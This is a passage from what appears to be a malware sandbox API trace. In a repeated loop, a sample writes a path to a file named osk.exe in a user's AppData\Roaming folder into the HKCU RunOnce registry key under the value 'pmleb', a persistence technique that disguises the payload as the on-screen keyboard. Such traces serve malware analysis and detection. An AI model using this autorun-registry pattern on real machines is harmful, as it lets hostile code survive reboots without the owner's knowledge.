out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.867] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x18 [0077.867] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.867] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.867] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.867] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.867] 
SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.867] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.868] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.868] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.868] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.868] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", 
Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.868] RegCloseKey (hKey=0x280) returned 0x0 [0077.868] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.868] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.868] SetTimer (hWnd=0x20280, nIDEvent=0x2018, uElapse=0xa, lpTimerFunc=0x0) returned 0x2018 [0077.868] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.883] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.883] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.884] KillTimer (hWnd=0x20280, uIDEvent=0x2018) returned 1 [0077.884] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.884] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.884] IUnknown:Release (This=0x787518) returned 0x1 [0077.884] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.884] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.884] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, 
pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.885] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 
[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.885] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x19 [0077.885] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.885] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1a [0077.885] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.886] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x19 [0077.886] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.886] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.886] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.886] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.886] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.886] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.886] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.886] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.887] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.887] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.887] RegCloseKey (hKey=0x280) returned 0x0 [0077.887] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.887] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.887] SetTimer (hWnd=0x20280, nIDEvent=0x2019, uElapse=0xa, lpTimerFunc=0x0) returned 0x2019 [0077.887] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.896] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.896] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.897] KillTimer (hWnd=0x20280, uIDEvent=0x2019) returned 1 [0077.897] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.897] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.897] IUnknown:Release (This=0x787518) returned 0x1 [0077.897] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.897] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.897] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.897] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.897] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.898] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.898] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.898] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.898] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.898] 
FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1a [0077.898] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.898] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1b [0077.898] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.899] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1a [0077.899] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.899] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.899] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.899] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.899] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.899] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.899] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.899] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.899] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.899] RegCloseKey (hKey=0x280) returned 0x0 [0077.899] IUnknown:Release 
(This=0x7a9740) returned 0x1 [0077.899] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.900] SetTimer (hWnd=0x20280, nIDEvent=0x201a, uElapse=0xa, lpTimerFunc=0x0) returned 0x201a [0077.900] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.912] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.912] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.913] KillTimer (hWnd=0x20280, uIDEvent=0x201a) returned 1 [0077.913] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.913] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.913] IUnknown:Release (This=0x787518) returned 0x1 [0077.913] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.913] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.913] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, 
wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.913] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.914] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.914] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.914] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1b [0077.914] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, 
